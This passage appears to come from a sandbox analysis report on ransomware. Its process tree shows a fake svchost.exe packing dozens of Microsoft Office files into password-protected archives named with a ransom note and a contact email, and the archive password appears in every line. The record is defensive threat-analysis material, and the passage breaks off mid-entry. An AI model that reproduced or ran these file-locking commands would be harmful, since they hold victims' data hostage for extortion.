  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1016
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:812
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1520
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3060
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2332
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:112
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1592
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2356
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2284
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2380
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2224
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1916
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1520
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\msvkp\svchost.exe
